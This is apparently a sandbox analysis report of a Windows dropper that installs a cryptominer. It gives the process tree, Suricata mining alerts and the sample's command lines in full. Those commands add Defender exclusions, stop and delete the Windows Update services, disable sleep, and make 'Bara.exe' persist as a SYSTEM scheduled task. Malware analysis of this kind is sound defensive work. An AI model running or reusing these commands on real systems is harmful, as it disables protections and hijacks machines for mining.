JHiuhe2rg7tds| Category | Machine | Started | Completed |
|---|---|---|---|
| FILE | s1_win7_x6401 | Feb. 19, 2025, 10:35 a.m. | Feb. 19, 2025, 10:43 a.m. |
-
-
Tbcelsmfm.exe "C:\Users\test22\AppData\Local\Temp\Tbcelsmfm.exe"
2764 -
-
powershell.exe powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
3012 -
cmd.exe cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
2820-
sc.exe sc stop UsoSvc
2868 -
sc.exe sc stop WaaSMedicSvc
2316 -
sc.exe sc stop wuauserv
3028 -
sc.exe sc stop bits
2932 -
sc.exe sc stop dosvc
2952 -
reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
2840 -
reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
1788 -
reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
2688 -
reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
1336 -
reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
2292
-
-
cmd.exe cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
1376-
powercfg.exe powercfg /x -hibernate-timeout-ac 0
2700 -
powercfg.exe powercfg /x -hibernate-timeout-dc 0
2148 -
powercfg.exe powercfg /x -standby-timeout-ac 0
1316 -
powercfg.exe powercfg /x -standby-timeout-dc 0
2076
-
-
powershell.exe powershell <#tkmebyokj#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'Barac' /tr '''C:\Program Files\Cuis\bon\Bara.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Cuis\bon\Bara.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Barac' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Barac" /t REG_SZ /f /d 'C:\Program Files\Cuis\bon\Bara.exe' }
812 -
powershell.exe powershell <#byjeowvd#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "Barac" } Else { "C:\Program Files\Cuis\bon\Bara.exe" }
2256
-
-
MLjvrefsd5vf1.exe "C:\Users\test22\AppData\Local\Temp\MLjvrefsd5vf1.exe"
2852
-
| Name | Response | Post-Analysis Lookup |
|---|---|---|
| usa-east.raptoreum.zone |
Suricata Alerts
| Flow | SID | Signature | Category |
|---|---|---|---|
| TCP 192.168.56.101:49170 -> 31.220.102.19:3333 | 2017871 | ET COINMINER W32/BitCoinMiner.MultiThreat Subscribe/Authorize Stratum Protocol Message | Crypto Currency Mining Activity Detected |
| TCP 192.168.56.101:49170 -> 31.220.102.19:3333 | 2017871 | ET COINMINER W32/BitCoinMiner.MultiThreat Subscribe/Authorize Stratum Protocol Message | Crypto Currency Mining Activity Detected |
| TCP 192.168.56.101:49170 -> 31.220.102.19:3333 | 2017871 | ET COINMINER W32/BitCoinMiner.MultiThreat Subscribe/Authorize Stratum Protocol Message | Crypto Currency Mining Activity Detected |
Suricata TLS
No Suricata TLS
| pdb_path | D:\Projects\WinRAR\sfx\build\sfxrar64\Release\sfxrar.pdb |
| section | .didat |
| section | _RDATA |
| resource name | PNG |
| file | C:\Users\test22\AppData\Local\Temp\Tbcelsmfm.exe |
| file | C:\Users\test22\AppData\Local\Temp\MLjvrefsd5vf1.exe |
| file | C:\Users\test22\AppData\Local\Temp\lgigivedpdvfs.exe |
| cmdline | powershell <#byjeowvd#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "Barac" } Else { "C:\Program Files\Cuis\bon\Bara.exe" } |
| cmdline | powershell <#tkmebyokj#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'Barac' /tr '''C:\Program Files\Cuis\bon\Bara.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Cuis\bon\Bara.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Barac' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Barac" /t REG_SZ /f /d 'C:\Program Files\Cuis\bon\Bara.exe' } |
| cmdline | powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force |
| file | C:\Users\test22\AppData\Local\Temp\MLjvrefsd5vf1.exe |
| cmdline | powershell <#byjeowvd#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "Barac" } Else { "C:\Program Files\Cuis\bon\Bara.exe" } |
| cmdline | sc stop wuauserv |
| cmdline | sc stop UsoSvc |
| cmdline | sc stop WaaSMedicSvc |
| cmdline | powershell <#tkmebyokj#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'Barac' /tr '''C:\Program Files\Cuis\bon\Bara.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Cuis\bon\Bara.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Barac' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Barac" /t REG_SZ /f /d 'C:\Program Files\Cuis\bon\Bara.exe' } |
| cmdline | reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f |
| cmdline | reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f |
| cmdline | cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f |
| cmdline | reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f |
| cmdline | sc stop bits |
| cmdline | reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f |
| cmdline | sc stop dosvc |
| host | 185.157.162.126 | |||
| cmdline | powershell <#tkmebyokj#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'Barac' /tr '''C:\Program Files\Cuis\bon\Bara.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Cuis\bon\Bara.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Barac' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Barac" /t REG_SZ /f /d 'C:\Program Files\Cuis\bon\Bara.exe' } |
| file | C:\Users\test22\AppData\Local\Temp\Tbcelsmfm.exe |
| file | C:\Users\test22\AppData\Local\Temp\lgigivedpdvfs.exe |
| file | C:\Users\test22\AppData\Local\Temp\MLjvrefsd5vf1.exe |
| cmd | powercfg /x -standby-timeout-dc 0powercfg /x -hibernate-timeout-ac 0 "c:\users\test22\appdata\local\temp\lgigivedpdvfs.exe" powershell <#byjeowvd#> if((new-object security.principal.windowsprincipal([security.principal.windowsidentity]::getcurrent())).isinrole([security.principal.windowsbuiltinrole]::administrator)) { schtasks /run /tn "barac" } else { "c:\program files\cuis\bon\bara.exe" }c:\users\test22\appdata\local\temp\tbcelsmfm.exec:\windows\system32\dialer.exe"c:\users\test22\appdata\local\temp\mljvrefsd5vf1.exe" sc stop wuauserv cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0powercfg /x -standby-timeout-ac 0 sc stop usosvc sc stop waasmedicsvc powershell <#tkmebyokj#> if((new-object security.principal.windowsprincipal([security.principal.windowsidentity]::getcurrent())).isinrole([security.principal.windowsbuiltinrole]::administrator)) { if([system.environment]::osversion.version -lt [system.version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'system' /tn 'barac' /tr '''c:\program files\cuis\bon\bara.exe'''" } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\program files\cuis\bon\bara.exe') -trigger (new-scheduledtasktrigger -atstartup) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'barac' -user 'system' -runlevel 'highest' -force; } } else { reg add "hkcu\software\microsoft\windows\currentversion\run" /v "barac" /t reg_sz /f /d 'c:\program files\cuis\bon\bara.exe' }reg delete "hklm\system\currentcontrolset\services\wuauserv" /f reg delete "hklm\system\currentcontrolset\services\usosvc" /f c:\users\test22\appdata\local\temp\lgigivedpdvfs.exepowercfg /x -hibernate-timeout-dc 0 cmd /c sc stop usosvc & sc stop waasmedicsvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "hklm\system\currentcontrolset\services\usosvc" /f & reg delete "hklm\system\currentcontrolset\services\waasmedicsvc" /f & reg delete "hklm\system\currentcontrolset\services\wuauserv" /f & reg delete "hklm\system\currentcontrolset\services\bits" /f & reg delete "hklm\system\currentcontrolset\services\dosvc" /freg delete "hklm\system\currentcontrolset\services\bits" /f sc stop bits reg delete "hklm\system\currentcontrolset\services\waasmedicsvc" /f sc stop dosvc powershell add-mppreference -exclusionpath @($env:userprofile, $env:programfiles) -forcec:\users\test22\appdata\local\temp\mljvrefsd5vf1.exe"c:\users\test22\appdata\local\temp\tbcelsmfm.exe" |
| cmdline | powershell <#tkmebyokj#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'Barac' /tr '''C:\Program Files\Cuis\bon\Bara.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Cuis\bon\Bara.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Barac' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Barac" /t REG_SZ /f /d 'C:\Program Files\Cuis\bon\Bara.exe' } |